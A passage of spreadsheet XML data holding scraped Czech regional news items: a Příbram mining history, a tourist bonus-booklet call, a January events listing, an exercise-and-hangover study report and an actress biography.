2025 Nové číslo magazínu Akce Zábava už je na stáncích. Přinášíme krátký přehled toho, co v lednovém výtisku zjistíte. A to nejlepší? Na výdejních místech... Jan Horejš; tisková zpráva - 10:44, Pondělí, 23. prosince 2024 Chcete vyrazit mezi svátky na hrad? Tematické prohlídky připravil hrad Šternberk na Olomoucku. Uslyšíte při nich o historii Vánoc, ale i o tradicích a... Jan Horejš; tisková zpráva - 9:33, Čtvrtek, 12. prosince 2024 Vánoční koncert Tarji Turunen , který se pod názvem „Dark Christmas“ uskuteční v sobotu 14. prosince od 20 hodin na Výstavišti Flora, bude mít již... Jan Horejš; tisková zpráva - 11:03, Středa, 11. prosince 2024 Vilém Burian proměnil vášeň pro sport a umění v unikátní koncept, který láká kreativce. Ateliér NopNog, za nímž stojí bývalý hokejista olomouckých Kohoutů, nabízí... Sledujte nás na sociálních sítích Autor: Jan Horejš Autor person Jan Horejš Rubrika transition_slide Krimi</t>
  </si>
  <si>
    <t>3760</t>
  </si>
  <si>
    <t>4330</t>
  </si>
  <si>
    <t>20250101_430_3692506881_0b1c60d3dc6ab86a7e72.html</t>
  </si>
  <si>
    <t>0b1c60d3dc6ab86a7e72</t>
  </si>
  <si>
    <t>Příběhy z Březového vrchu XI.: hormistr Jiří Tomáš Pusch</t>
  </si>
  <si>
    <t>Příběhy z Březového vrchu XI.: hormistr Jiří Tomáš Pusch Rubrika: HISTORIE V červenci 1704 zemřel hormistr Jakub Bittner. Začátkem příštího roku předložil magistrát české komoře žádost, aby mohl úřad hormistra vzhledem ke skromnému dolování a výnosu stříbrných hor zastávat některý z příbramských měšťanů. Za ušetřený hormistrovský plat chtěla obec zaměstnat další dva až tři horníky. Česká komora však ustanovila příbramským hormistrem s ročním platem 150 zlatých německy mluvícího malostranského měšťana Jiřího Tomáše Pusche (* asi 1662), dosavadního správce rožmitálského arcibiskupského statku, jeho železáren a vysokých pecí. Hormistrovskou přísahu složil koncem ledna 1705. Pracovalo se jen na štole Matky Boží u Svaté Hory, ale Pusch už nechal stavět kavnu u znovu otevíraného, ale starého dolu Nové léto jinak Novoročního „pod Březovým vrchem“, v němž se začalo dolovat příštího roku. Dnes je zasypaný v severní části odvalu dolu Anna. Postup prací záležel hlavně na tom, kolik peněz se vybralo na cupusech a kolik jich hormistr dostal od místního výběrčího na dani z piva a vína . Na dolování se mělo ročně z tácu vynakládat nejméně 144 zl., magistrát se zavázal ještě k příplatku 100–150 zl. Od června 1690 byl výběrčím tácu voskář, solní a kontribuční úředník a radní Filip Václav Wiesser, od července 1706 i primátor města. DŮLEŽITÉ ZDROJE PŘÍJMU Roku 1698 se ze sudu (asi 255 l) piva prodávaného po začátku 18. století za 9 zl. 30 kr. platil tác ve výši 1 zlatý 18 krejcarů. Podle účtů z let 1710–1712 dosahoval roční výstav kolem 1200 sudů, asi 3082 hl piva . V jedné várce bylo 21 ¾ sudu. Pivo bylo vedle železárny druhým nejdůležitějším zdrojem městských příjmů. V roce 1705 činily celkové výdaje na dolování včetně platů dvou horníků 204 zl. 18 kr. V roce 1706 pracoval jeden horník se dvěma hašplíři a celkové výdaje dosáhly 251 zl. 8 kr. V roce 1707 měl každý ze čtyř horníků týdenní plat 1 zl. 10 kr. Půl roku pracovali i dva hašplíři, půl roku tři, každý dostával týdenní mzdu 1 zl. Po 23 dnů čerpali vodu dva nádeníci za denní mzdu 6 kr., tedy půl zlatého týdně. Na stavbě nové kavny u Matkobožské štoly pracoval zedník, který tam dělal kamna, truhlář vyrobil okenní rám a sklenář okno. Celkové náklady včetně veškerého materiálu dosáhly 458 zl. 26 kr. Nový král Josef I. byl reformátor. Pro povznesení hornictví, které řídil nejvyšší mincmistr a hormistr Petr František hrabě Kokořovec z Kokořova, jmenoval 9. června 1707 dosavadního adjunkta správce vrchního horního úřadu v Jáchymově Jana Františka Lauera vrchním inspektorem horních měst a dolování v Českém království a zároveň správcem vrchního horního úřadu v Jáchymově , s platem 800 zl. ročně. Lauer prý získal potřebné znalosti od svého zkušeného otce, ale hlavně půjčil Josefovi I. 20 000 zl. Sekretář české komory Jan Kryštof Bořek z Dohalic si ale už roku 1708 zapsal, že nejvyšší mincmistr ani vrchní inspektor hornictví nerozumějí a jsou i jinak neschopní. Hormistr Pusch koupil v srpnu 1708 v Příbrami od radního Václava Lorence za 200 zl. domek se zahradou za arcibiskupským zámkem, a ještě toho roku k němu dostal od magistrátu pivní várku, protože „prý na tomto domku kdysi bývala“. Od Josefa Mohelnického přikoupil hormistr okolní pozemky s domem a nechal si tam pro svou rodinu postavit nový dům. Tak vzniklo jedno z největších příbramských hospodářství Na Příkopech čp. 105/I, dnes stavební úřad. DOMEČEK SE ZAHRÁDKOU ZA 53 ZLATÝCH Oficiálním pomocníkem hormistra Pusche se 10. září 1708 stal Matěj Alis (děd známého hormistra J. A. Alise), dosavadní šichtmistr příbramských železných hutí, a to jako šichtmistr stříbrných hor. Když se na přelomu října a listopadu objevovalo v Novoročním dole stále víc a víc důlních vod, rozhodl se hormistr se šichtmistrem v týdnu od 10. do 17. listopadu hloubit novou šachtu nad dolem Nové léto, aby se „nadále mohly hnát štoly pod Novým létem a celým Březovým vrchem“. To je počátek dědičné odvodňovací štoly, která se razila tak, aby ústila nad Podměstským rybníkem čili Dolejší Oborou . Později se jí začalo říkat štola Císaře Karla čili Císařská ( Karel VI . byl zvolen císařem v říjnu 1711). My ji známe pod názvem Karlo- Boromejská a svému účelu slouží dodnes. U horního závodu pracovali tehdy tři havíři a tři hašplíři a najímáno bylo od tří do pěti nádeníků. Na podzim 1708 přijel inspektor Lauer na vizitaci a stanovil nové mzdy: štajgr měl týdně 1 zl. 15 kr., horník 1 zl. 10 kr. a hašplíř 48 kr. (domeček se zahrádkou na Březovém vrchu se tehdy prodával za 53 zl.). Celkem se roku 1708 na dolování vynaložilo přes 594 zl. a práce na uvedených dílech probíhaly i v následujících letech. Začátkem roku 1710 onemocněl a v říjnu zemřel primátor a výběrčí ordinárního tácu Filip Václav Wiesser. Ordinární tác od března vybíral jeho syn, zlatník Severin Wiesser, jehož kauci 500 zl. pojistil na svých pozemcích jeho švagr Matěj Alis. Na jaře 1711 se začalo dolovat na staré fundgrubě Naší milé Paní na Březovém vrchu, celkem v dolech pracovalo 12 až 14 horníků. V dubnu 1712 se stal primátorem a administrátorem obecního hospodářství krejčí Václav Tomáš Lorenc. Snažil se umořovat obecní dluhy dosahující už částky přes 9000 zl. a zároveň čelit rostoucím nákladům na vojsko. Od října 1713 se Příbram musela vypořádat s rok trvající morovou epidemií. Po městě se začaly šířit zprávy o Lorencově benevolenci při vymáhání pohledávek od měšťanů a pomalém splácení obecních dluhů, a dostaly se i k nadřízeným úřadům. Hormistr Jiří Tomáš Pusch vzal tehdy na prohlídku stříbrných dolů dva obecní starší, kteří pak na radnici potvrdili, že by se v nich mohlo najít mnoho stříbra. Magistrát poslal žádost o podporu dolů nejvyššímu mincmistrovi Františku Karlovi hraběti z Pöttingu a vyslal primátora Lorence a jednoho radního za hormistrem Puschem se zprávou, že obec má v úmyslu se na dolování finančně podílet a koupit jednu nabízenou šichtu kukusů od březohorského těžařstva. NEVYSEDÁVAT A NEUPÍJET V říjnu 1714 si radní předvolali obecního sládka a oznámili mu, že se z každé várky bude jedna čtvrtce piva z dolívky odebírat a peníze z jejího prodeje se využijí na dolování. Zakázali mu nalévat pivo do příliš velkých džbánů, které k němu lidé pro pivo posílali, aby jim nedával víc, než měl, a nechávat lidi v pivovaru vysedávat a upíjet z obecního piva . Na rozvoj stříbrných dolů magistrát ještě přenechal dvě čtvrtce piva , která se dosud stáčela místo deputátních patok primátorovi a důchodnímu. Při ceně 48 krejcarů za toto pivo se z 60 várek mohlo získat 237 zl. ročně. V listopadu požádal magistrát nejvyššího mincmistra znovu o přímluvu, aby česká komora dovolila kukusy koupit. Mincmistr prostřednictvím hormistra Pusche magistrátu vzkázal, aby za ním primátor Václav Lorenc a radní Martin Hutter přijeli do Prahy a otázku kukusů s ním projednali ústně. Obec se 48 kukusů za 135 zlatých a 36 krejcarů ujala 21. ledna 1715. Inspektor horních měst Jan František Lauer ale v té době už spřádal plán, jak Václava Lorence sesadit z jeho úřadů. Pomáhal mu hormistr Jiří Tomáš Pusch, který se v červnu 1714 odmítl stát regulérním příbramským měšťanem, což bylo nutné, aby magistrát mohl přijmout jeho dům jako záruku za kauci jeho zetě Petra Jakuba Rubrici, který se měl stát novým kontribučním úředníkem a taky byl cizím měšťanem. Hormistr požádal v září o lhůtu šesti týdnů, ale ani pak o vykonání přísahy věrnosti nestál, a tak magistrát začátkem listopadu nařídil, že se hned po uplynutí lhůty pověsí na hormistrův dům dražební cedule. Po 6. prosinci 1714 si magistrát hormistra kvůli přijetí městského práva ještě jednou předvolal. Pusch argumentoval, že je měšťanem královského Menšího Města pražského a že se v královském horním městě Příbrami bez přijetí městského práva může usadit i každý obyčejný horník. Tvrdil, že si to ještě rozmyslí. PŘESLECHNUTÍ PÍSAŘE Dne 13. prosince 1714 přišlo rozhodnutí české komory, že primátor Lorenc bude suspendován z úřadu administrátora obecního hospodářství, který převezme hormistr Pusch. Překvapený primátor se dvěma členy magistrátu vyhledal právníka, který mu po dohodě s ostatními představiteli městské samosprávy sestavil supliku. Stálo v ní, že dekret komory o předání hospodářské administrace hormistrovi Puschovi je napsán německy, čemuž magistrát dostatečně nerozumí, a proto žádal o tři dny na jeho překlad. A že hormistr bude zmocněn potvrzovat všechny hospodářské dokumenty, z čehož vyplyne porušení privilegií příbramské obce. Všichni radní, rychtář, obecní starší a další úředníci supliku potvrdili podpisem s tím, že „v tom všem chtějí žít a umřít“. Česká komora ji prohlásila za vzpouru a pohrozila trestem, a tak se všichni kromě primátora Lorence podepsali na omluvný list, že slova ohledně smrti byla do supliky zapsána přeslechnutím písaře, že se na to nikdo nepamatuje a že měšťané podepsaní na suplice nebyli při jejím sepisování přítomni. Hormistr Pusch se úřadu administrátora obecního hospodářství ujal a dožadoval se předání všech městských písemností. Primátor Lorenc se ale rozhodl, že mu bez boje neustoupí. Pivo bylo vedle železárny druhým nejdůležitějším zdrojem městských příjmů. (Pokračování příště). Původně Puschův dům po první velké přestavbě. Nejstarší známé foto. Zdroj: Jitka Novotná Původně Puschův dvůr č. p. 105/I na Příkopech už s přístavbami. Zdroj: SOkA Příbram Autor: Věra Smolová SOA v Praze – SOkA Příbram Autor person Věra Smolová Rubrika transition_slide HISTORIE</t>
  </si>
  <si>
    <t>20250101_431_3692506888_e4ee3fb19017b2cd0125.html</t>
  </si>
  <si>
    <t>e4ee3fb19017b2cd0125</t>
  </si>
  <si>
    <t>VYTVOŘTE S NÁMI POLABÍ PLNÉ ZÁŽITKŮ A CHUTÍ</t>
  </si>
  <si>
    <t>VYTVOŘTE S NÁMI POLABÍ PLNÉ ZÁŽITKŮ A CHUTÍ Město Lysá nad Labem ve spolupráci s okolními městy a ve spolupráci s MAS Střední Polabí připravuje bonusovou knížku s názvem Polabí plné zážitků a chutí. Knížka v elektronické nebo tištěné verzi nabídne přehled atraktivních míst, která určitě stojí za návštěvu. Slevy na ubytování, zvýhodněné vstupy do turistických míst, drobné dárky nebo třeba pivo k obědu zdarma? To vše by v sezoně 2025 měla nabízet nová bonusová knížka určená turistům, ale i občanům našeho města. První vydání bude zdarma a distribuční místa budou u partnerů, kteří jsou v knížce uvedeni. Předpokládáme náklad 2000 kusů a platnost dva roky. Primárním cílem je rozšíření povědomí o živnostnících a získání nových zákazníků. Prosíme o potvrzení vašeho zájmu a zaslání nezbytných informací prostřednictvím aplikace MUNIPOLIS v sekci Polabí plné zážitků. Pošlete nám, prosíme, stručnou charakteristiku vašeho podniku (maximální rozsah 1000 znaků), adresu, kontaktní informace a webové stránky či odkaz na profil na sociálních sítích a formu poskytované slevy, a to do pátku 14. února 2025. Doporučujeme, aby forma slevy nebo odměny byla taková, aby nalákala potenciální návštěvníky nebo kupující. Nicméně je zapotřebí si uvědomit, že knížka bude poskytována zdarma v tištěné i elektronické verzi, proto je nutné nastavit slevu či dárek zdarma tak, abyste při jejím čerpání neprodělávali. Zde jsou ukázky drobných dárků nebo slev použitých v obdobném projektu, jako je ten náš: https://www.litomerice.cz/top-bar/ bonusova-knizka Jste živnostník nebo podnikatel a rád byste zviditelnil své služby? Ozvěte se nám a navažte s námi spolupráci. Kontaktní osobou je Aneta Dušková, e-mail: aneta.duskova@mestolysa.cz. S dotazy ohledně projektu se neváhejte obrátit na Pavla Veselého (pavel.vesely@brandysko.cz, 775 975 733) nebo na Olgu Fábry (fabry@strednipolabi.cz). Těšíme se na spolupráci s vámi. Zdeňka Tichá, vedoucí Odboru školství, kultury a sportu</t>
  </si>
  <si>
    <t>20250101_432_3692509280_1e83f90d4bc089e7ae26.html</t>
  </si>
  <si>
    <t>1e83f90d4bc089e7ae26</t>
  </si>
  <si>
    <t>Přehled kulturních událostí na měsíc leden</t>
  </si>
  <si>
    <t>Přehled kulturních událostí na měsíc leden Kulturní události Kultura s.r.o. Pelclovo divadlo • BENEFIČNÍ NOVOROČNÍ KONCERT 11. 1. 2025, 16.00 Účinkují žáci a učitelé ZUŠ RK, Krnov a Jeseník • 4 TENOŘI 12. 1. 2025, 18.00 Novoroční galakoncert Marian Vojtko – Pavel Vítek – Jan Kříž – Michal Bragagnolo za doprovodu Unique Quartet. VYPRODÁNO • VINCENC / Torben Betts 20. 1. 2025, 19.00 Hra běžně u nás uváděna pod názvem Kočka v oreganu. Více na str. 10. Hrají: Jan Zadražil , Jitka Nerudová , Eva Elsnerová , Petr Halíček . Režie: Pavel Lagner Uvádí: Spolek Kašpar divadlo v Celetné Vstupné: 490, 470 Kč. Předprodej probíhá. • NEJÚSPĚŠNĚJŠÍ SPOROTOVEC ROKU 2024 31. 1. 2025, 18.00 13. ročník slavnostního vyhlášení ankety Nejúspěšnější sportovec roku 2024. PŘIPRAVUJEME • TRADIČNÍ MYSLIVECKÝ PLES 1. 2. 2025, 20.00 Hraje kapela Fantasy music, bohatá tombola, myslivecká kuchyně. Vstupné: 200 Kč. Objednávky míst na tel.: 605877615, platba při vstupu. • SIRÉNY NA CESTÁCH 11. 2. 2025, 19.00 Zcela nová zábavná talk show ženské trojice hereček a zpěvaček Sandry POGODOVÉ , Jitky ASTEROVÉ a Lindy FINKOVÉ . Nenechte si ujít jejich neotřelý smysl pro humor a vzájemnou chuť si ze sebe utahovat. Vstupné: 490 Kč. Předprodej probíhá. SPOLEČ. CENTRUM • NOVOROČNÍ TANEČNÍ ODPOLEDNE 5. 1. 2025, 14.00 K tanci hraje taneční skupina STUDIO MIX a COMBI. Vstupné: 130 Kč. Předprodej probíhá • TANEČNÍ ODPOLEDNE 19. 1. 2025, 14.00 K tanci hraje taneční skupina COMBI. Vstupné: 100 Kč • RADŮZA - koncert 29. 1. 2025, 19.00 Vstupenky: 450 Kč/předprodej, 490 Kč/na místě. Předprodej probíhá. Více str. 10. PŘIPRAVUJEME • DOBRODRUŽSTVÍ PANAMA 12. 2. 2025, 19.00 Pozemským rájem, který objevil Kryštof Kolumbus . Cestovatelská projekce Kateřiny a Miloše MOTANI z výpravy deštnými pralesy ve dne i v noci, spousta barevných žabiček, velcí pavouci, uřvaní vřesťani, setkání s domorodými INDIÁNY, překrásný svět Pacifiku. Vstupné: 140 Kč MĚSTSKÁ KNIHOVNA • OBRAZY PODLE BIBLE Do 6. 1. 2025 Výstava - Josef Kejval • ŽÍT SVŮJ ŽIVOT 8. 1. - 10. 2. 2025 Výstava obrazů Jana Bártová Vernisáž 8. 1. 2025, 18.00 • HOMESHARING 22. 1. 2025, 18.00 Pomáhejme společně tam, kde to dává smysl. Mgr. Iva Pechancová, Mgr. Mirka Červinková MBA. HOTEL STUDÁNKA PŘIPRAVUJEME • MUZIKÁLY NARUBY 8. 8. 2025, 19.00 Místo konání: letní amfiteátr HOTEL HAVEL • KULTURA S HAVLEM Při zakoupení vstupenky na rychnovskou kulturní akci, můžete v den akce od 16.00 do 19.00 využít 15% slevu v restauraci, kavárně či pivnici. Místo konání: Hotel Havel • HOTELOVÁ PIVNICE Pátky a Soboty, 15.00 Na čepu pivní speciály a tradiční speciality k pivu . Místo konání: Hotel Havel MC JÁJA • HERNA PRO RODIČE S DĚTMI Po – Čt, 9.00 – 11.30 RŮZNÉ • NOVOROČNÍ OHŇOSTROJ 1. 1. 2025, 18.00 Přátelské setkání Místo konání: Kulturní Kvasiny • NOVOROČNÍ BOHOSLUŽBA 1. 1. 2025, 15.00 Požehnání roku 2025 Místo konání: Církev Československá Husitská, Husův sbor proti poště • MŠE SVATÁ NOVOROČNÍ 1. 1. 2025, 9.00 Římskokatolická farnost Místo konání: Kostel Nejsvětější Trojice, RK • TŘÍKRÁLOVÝ KONCERT 4. 1. 2025, 14.00 Jan Jakub Ryba: Česká mše vánoční Místo konání: Kostel Nanebevzetí Panny Marie, Neratov • BETLÉMY NA ZÁMKU Do 2. 2. 2025 14. ročník tradiční výstavy Místo konání: Zámecká galerie, Kvasiny RŮZNÉ • PRODEJNÍ VÝSTAVA KERAMIKY Do 9. 1. 2025 Drobná vánoční keramika od keramičky Blanky Hruškové Místo konání: Knihovna Častolovice • DRUHÝ ZIMNÍ PLES 18. 1. 2025, 19.30 Veškerý výtěžek poputuje na konto Dětského domova Sedloňov . Vstupné: 250 Kč / místenka + dobrovolný příspěvek. Předprodej vstupenek na tel.: 602411958 Místo konání: Orlickohorské společenské centrum, Orlické Záhoří čp. 6 • MEZINÁRODNÍ ZÁVOD NA SANÍCH ROHATÝCH 11. 1. 2025, 12.30 Místo konání: Orlické Záhoří – Ski areál Červená Voda • KRAJKA JAKO POKLAD 14. 1. – 30. 9. 2025 Rozšířené sbírky o díla Milči Eremiášové , Ludmily Kaprasové ale i o místní vamberecké krajkářky. Místo konání: Muzeum krajky Vamberk • VORY A VORAŘSTVÍ NA ORLICI 18. 1. 2025, 17.00 Přednáška o tom, jak tomu bylo s vorařstvím v Orlických horách , bude referovat Robert Müller . Místo konání: Sýpka – Muzeum Orlických hor, Rokytnice v O. h. • VEČER PŘI SVÍČKÁCH 25. 1. 2025, 17.00 Beseda s Petrem Štěpánkem a Zlatou Adamovskou, moderuje Tomáš Magnusek Místo konání: Kulturní dům, Kvasiny Sportovní události • NOVOROČNÍ ŠVIH 1. 1. 2025, 13.00 Předpokládaná trasa (cca 20 km): Rychnov n.Kn. – Končiny – Hradisko - Jahodová hora – Včelný – Rychnov n.Kn. Vhodné horské nebo trekingové kolo. Pořadatel: Cycling team Rychnov nad Kněžnou , z. s. Místo konání: Staré náměstí Rychnov nad Kněžnou – u vánočního stromu • HRÁTKY PRO PŘEDŠKOLÁKY V ZŠ Javornická je pro děti ve věku 1 – 6 let k dispozici tělocvična vybavená všelijakými pomůckami pro sportovní řádění s rodiči/prarodiči. Každou sobotu od 11. 1. 2025 do 29. 3. 2025 vždy 9 – 12 hod. KROMĚ SOBOTY 15. 3. 2025, KDY JSOU JARNÍ PRÁZDNINY. Vstupné 50,- Kč za každou osobu. Obuv do haly s sebou! Pořádá: VK Réma Rychnov 27. ročník Výstavy betlémů Letošní 27. ročník Výstavy betlémů nabídl přes sto různých exponátů. K vidění zde byly kromě betlémů i podmalby na skle, háčkované či paličkované ozdoby nebo dřevořezby a další adventní tvorba. Návštěvníci, kterých přišlo bezmála tři tisíce, mohli obdivovat nejen betlémy dřevěné či papírové, ale například betlém z alabastru či z pískovce. Nechyběli ani betlémy mechanické a pro malé i velké také interaktivní betlém, kde mohli návštěvníci popustit uzdu své fantazie a sami si betlém postavit. Děkujeme všem tvůrcům, sběratelům i muzeím za zapůjčení exponátům a rovněž majitelům Kolowratského zámku za zapůjčení prostor pro tuto výstavu. Těšíme se na setkání v letošním roce. 28. ročník bude zahájen v pátek 12. prosince 2025. KD Vaše pozvánky do kulturního a sportnovního přehledu posílejte na e-mailovou adresu Rychnovského zpravodaje zpravodaj@rychnov-city.cz Prezentace akcí na této straně je zdarma.</t>
  </si>
  <si>
    <t>20250101_433_3692507569_ec8ded0dc3c9912f1217.html</t>
  </si>
  <si>
    <t>ec8ded0dc3c9912f1217</t>
  </si>
  <si>
    <t>Receptury na kocovinu bývají pověry. Jeden však funguje, říká studie</t>
  </si>
  <si>
    <t>Receptury na kocovinu bývají pověry. Jeden však funguje, říká studie Další přínos cvičení: dosáhne i na večírky Nejzázračnější lék na světě. Studie teď navíc tvrdí, že cvičení dosáhne i na kocovinu. Nejzázračnější pilulka na světě, tak se stále častěji mluví o cvičení . Práce vydaná v magazínu Addictive Behaviors chválí fyzickou aktivitu z velmi netradičního úhlu. Kromě mnoha podstatnějších benefitů totiž cvičení zmírňuje následky kocoviny, zjistila studie na základě výzkumu, který obsáhl téměř 1 700 mužů a žen. Má to však několik podmínek. Preventivní dopady na kocovinu má cvičení, které se chlubí vysokou intenzitou, mírné nasazení nestačilo. Energická tělesná aktivita podle závěrů studie dovede redukovat jak riziko kocoviny, tak její sílu. Velmi zajímavé zjištění na vědním poli, jemuž se nevěnuje dostatečná pozornost, oceňuje netradiční výzkum běžecký server Runners World . Samozřejmě zdůrazňuje, že zjištění není výzvou k pravidelnému luxování domácího baru. Jen pro jistotu však připomíná, že mezi aktivity vysoké intenzity, které mají mít největší vliv na kocovinu, patří například intervalový běh. Závěr studie by však zcela jistě měl být další pobídkou ke cvičení. Pravidelnému, protože to bylo podmínkou protikocovinového efektu. Práce dokonce naznačuje, proč cvičení dovede být nápomocné i v tomto ohledu. Zlepšuje dlouhodobou kvalitu spánku, napomáhá tedy lepšímu odpočinku i po bujarém pití. Cvičení rovněž uvolňuje endorfiny, které mohou zmírňovat bolest hlavy. Navíc již věda ví, že cvičení produkuje protizánětlivé cytokiny, a to se při kocovině hodí, protože její symptomy může zhoršovat zánětlivá reakce, kterou alkohol spouští. Na všechny otázky však studie neodpovídá. Nespecifikuje, v jakém předstihu před večírkem byste si energickou sportovní aktivitu měli dopřát, abyste se jejích protikocovinových efektů domohli, poznamenává server Women’s Health . Cvičení je přitom jednou z mála receptur, jimž věda vystavila certifikát efektivity, jde-li o kocovinu. Další doporučení jejím prověřováním neprošla, jsou však mnohdy tak barvitá, že stojí za připomenutí i tak. Autor: Tomáš Bratříček Autor person Tomáš Bratříček</t>
  </si>
  <si>
    <t>20250101_434_3692507454_b7f0c7a04f9e5824b238.html</t>
  </si>
  <si>
    <t>b7f0c7a04f9e5824b238</t>
  </si>
  <si>
    <t>FILMOVÁ HEDUŠ SI RÁDA dopřávala i milostné aférky</t>
  </si>
  <si>
    <t>FILMOVÁ HEDUŠ SI RÁDA dopřávala i milostné aférky Helena Růžičková (†67) * 13. 6. 1936 † 4. 1. 2004 Kouzlem své osobnosti a hereckého umění bohatě přebila i vytrv i vytrvale přibývající kilogramy. Diváci ji zbožňovali, ovšem někteří její blízcí věděli, že žít s ní nebylo právě jednoduché. Legendární Helena Růžičková (†67) byla zkrátka svérázná dáma, která si uměla užívat života. Budoucí slavná herečka Helena Růžičková (†67) toužila po prknech, která znamenají svět, snad ještě dřív, než se naučila pořádně mluvit. Odmalička chodila do baletní školy známé primabaleríny Heleny Štěpánkové (†77) a vystupovala v dětských rolích v Národním divadle . Okaté Helence byly teprve čtyři roky, když se poprvé mihla i ve filmu. Bylo to ve slavném snímku Babička z roku 1940, s Terezií Brzkovou (†91) v hlavní roli. První cigarety jí koupili rodiče Do jisté míry za to mohla cílevědomá výchova Heleniných rodičů. Její tatínek, bývalý legionář, ji už od časného dětství vedl k lásce k umění. Také se rozhodl, že jeho milovaná dceruška musí něco vydržet. Proto ji při jedné procházce Prahou hodil bez varování i v šatech do Vltavy . Jinak však byla Helena vychovávána velmi tolerantně. Sama říkala, že první cigarety jí koupili rodiče, když přišli na to, že už ve čtyřech letech kouří. To proto, aby nic nedělala za jejich zády. Když si pak zapálila před svými vrstevníky, bylo z toho obrovské pozdvižení. Ji to ale v žádném případě nemohlo rozházet. Měla cigarety zkrátka ráda a do konce života se jich nevzdala. Věštila z kávové sedliny Růžičková se také už jako malá zajímala o věci mezi nebem a zemí. Údajně za to mohly geny po její mamince, která pocházela ze Sarajeva . Ona sama se pak celý život věnovala mnoha ezoterickým disciplínám. Uměla věštit z karet i z kávové sedliny, a dokonce poměrně přesně předpověděla některé tragické události. Například už v necelých devíti letech věděla dopředu o bombardování Prahy . Přes tyto speciální schopnosti a nesporný herecký talent Helena vystudovala Vyšší zdravotnickou školu a dlouho to vypadalo, že z ní bude zubní laborantka. Sice se hlásila na divadelní fakultu, ale tam ji nepřijali ani na druhý pokus. I tak se ale Růžičková do blízkosti divadelních prken nakonec dostala. Manžel nemusel na vojnu Při jedné ze svých neúspěšných přijímacích zkoušek se totiž seznámila se svým budoucím manželem, začínajícím hercem Jiřím Růžičkou (†71). Toho Helena milovala natolik, že se dokonce místo něj přihlásila na vojnu. Když Jiří dostal povolávací rozkaz, sebrala se a dojela osobně na vojenskou správu. Tam pak řekla, že se hlásí místo svého manžela. Vše vysvětlila tím, že právě dostudoval, má kariéru před sebou, kdežto jí, jako ženě v domácnosti, nic neuteče. Díky obrovskému kouzlu osobnosti a bohaté vyřídilce to Růžičkové tehdy prošlo, a manžel na vojnu nemusel. Helena tak mohla s Jiřím sdílet první angažmá. A aby mu mohla být neustále nablízku, přijala v divadle práci osvětlovačky. Malér na jevišti To už jí prkna, která znamenají svět, nadobro učarovala, a z osvětlovačky se časem stala úspěšná herečka. Jenže to by nebyla Helena, aby se jí nepřihodil nějaký malér. Jednoho dne se s pomocí alkoholu pořádně odvázala a při představení poslala komunisty upřímně a od plic do háje. Celá aféra pro ni pochopitelně skončila zákazem vystupování. Zoufalá Růžičková pak musela být hospitalizována na psychiatrii, aby se vzpamatovala. Do stálého angažmá se už nikdy nevrátila. Její doménou se stala televize a film, kde se její komediální talent konečně mohl naplno rozvinout. Zářila jako vražedkyně Štubová V té době už také bylo jasné, že tělnatá Růžičková nikdy nezhubne. Svou váhu přijala jako fakt a naučila se ji před kamerou skvěle uplatnit. Čeští diváci nikdy nezapomenou na její roztančenou Heduš z filmové trilogie o rodině Homolkových nebo na vražedkyni Štubovou z bláznivé komedie Pane, vy jste vdova! či vyšinutou pacientku psychiatrie v pohádce Dívka na koštěti. Později dokonce zazářila i v několika televizních seriálech, z nichž si diváci nejvíc zamilovali Vlak dětství a naděje. Svým hereckým uměním a smyslem pro humor Helena bohatě přebila vytrvale přibývající kilogramy. Aférka s filmovým krasavcem Rovněž není žádným tajemstvím, že po ní muži, navzdory její váze, doslova šíleli. Ona si jejich zájem naplno užívala a neodpírala si ani mimomanželský sex. Málokdo ale ví, že korpulentní herečka měla aférku i s takovým krasavcem, jakým byl americký zpěvák Dean Reed (†47). Poznali se v Německu , kde ona kolem roku 1975 krátce žila a kam zpěvák kvůli svému levicovému smýšlení emigroval. Helena však lovila i v českých vodách. Jejím dlouholetým milencem měl být i herec a malíř Josef Hlinomaz (†63). Jejich vztah ale už po několika letech přerostl z milostného okouzlení v celoživotní pevné přátelství. Milence zlato, manželce diamanty Žádnou z těchto svých milostných afér však Růžičková nepovažovala za nevěru. Svého manžela hluboce milovala a věřila, že jsou spojeni i pevným duchovním poutem. Prý to měla po svém otci, který měl sice milenky, ale manželku to nikdy nesmělo ohrozit. „Řídil se tím, že když milence zlato, tak manželce diamanty,“ vzpomínala později herečka. Byli spíš jako bratr a sestra Helena a Jiří měli jediného syna Jiřího (†43). A podobně jako kdysi její rodiče i ona vychovávala syna velmi tolerantně, tak nějak po svém. Byli si velmi blízcí a působili spíš jako bratr se sestrou než jako matka se synem. I v osobních životech měli mnoho společného. Stejně jako Helena se ani Jiří nedostal na konzervatoř, prý pro nedostatek talentu. Přesto hrál v několika filmech a se svou matkou jezdil na zábavné estrády. A stejně jako ona i on celý život bojoval s nadváhou. Ze své tloušťky, která se pohybovala až na hranici tří set kilogramů, si Růžička neustále dělal legraci. To ale nemohlo nic změnit na tom, že ho obezita nakonec stála život. Odešla do filmového nebe Smrt syna herečku téměř zlomila, a brzy mělo být ještě hůř. To když jen o pár let později odešel na věčnost i její milovaný manžel. Už neměla sílu bojovat s vážnou nemocí a 4. ledna 2004 následovala oba své Jirky do uměleckého nebe. Na svém synovi byla závislá Už jsme si řekli, že Helena Růžičková byla na svém jediném synovi Jiřím doslova závislá. Protože se Růžička mladší navzdory své silné postavě oženil dokonce třikrát, měla herečka postupně tři snachy. A ani s jednou nedokázala dobře vycházet. Ona sice stále tvrdila, že do synových manželství nikdy nezasahovala, její snachy by ale patrně řekly něco jiného. Jedna z nich se dokonce vyjádřila, že byl mladý Jirka obětí takzvané opičí lásky své matky. S tou poslední si ale Růžičková alespoň zpočátku docela rozuměla. Jak ale přibyly vnučky, a Jiří se musel ohánět, aby svou rodinu uživil, začalo manželství dostávat trhliny. Když došlo na nevyhnutelný rozvod, Růžičková prohlásila, že už nemá vnučky. Svého manžela hluboce milovala. Jako Škopková v legendární trilogii Slunce, seno, ... Ze svých kil navíc dokázala udělat velkou přednost. Muži se na ni vždycky lepili jako vosy na bonbon. Když si zapálila před svými vrstevníky, bylo z toho obrovské pozdvižení.</t>
  </si>
  <si>
    <t>20250101_435_3692507580_99408ba22d039137e737.html</t>
  </si>
  <si>
    <t>99408ba22d039137e737</t>
  </si>
  <si>
